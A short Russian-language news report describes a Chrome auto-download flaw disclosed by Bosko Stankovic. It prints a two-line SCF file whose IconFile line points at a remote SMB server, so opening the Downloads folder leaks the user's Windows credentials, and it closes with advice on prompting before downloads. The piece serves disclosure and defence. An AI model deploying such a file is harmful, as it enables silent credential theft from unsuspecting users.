Специалист из Сербии предложил весьма необычный способ кражи личных данных с ПК пользователя, благодаря особенностям браузера Google Chrome. Боско Станкович пишет, что это связано с загрузкой файлов браузером, которые он считает безопасными без одобрения пользователя. Звучит довольно дико, но это возможно.
Это возможно благодаря файлам с расширением SCF. Этот формат имеет очень узкий функционал примерно такой же, как и ярлыка(LNK). Google Chrome считает файлы с таким расширением безопасными, и сохраняет их в папку загрузок, которая стоит по умолчанию. Раньше этот эксплоит уже использовался с обычными ярлыками, т.к. они могли подгружать иконку из интернета, но позже Microsoft устранила эту ошибку, разрешив использование только локальных ресурсов. Но в SCF, это возможность имеется до сих пор.
Таким образом, Станкович продемонстрировал этот баг, создав файл с расширением SCF, который подгружал иконку с помощью ссылки на вредоносный сервер. То есть, при использовании этого файла, пользовательские данные будут переданы на сервер. Такой вирусный файл, содержит в себе всего лишь 2 строчки кода:
[Shell]
IconFile=\\170.170.170.170\icon
Вредоносный файл будет срабатывать каждый раз, при открытии папки загрузок. Пользователю даже не нужно ничего делать, вирус будет обращаться к SMB- серверу автоматически. Личные данные попадают напрямую на сервер, а если жертва использовала при этом ОС Windows 8 версии и выше, также отправляются и данные от сервисов, используемых там по умолчанию вроде Skype, Office или Xbox Live.
Данный эксплоит в браузере имеется до сих пор, чтобы предотвратить себя от возможной кражи данных рекомендуется поставить в настройках запрос перед каждой скачкой файлов.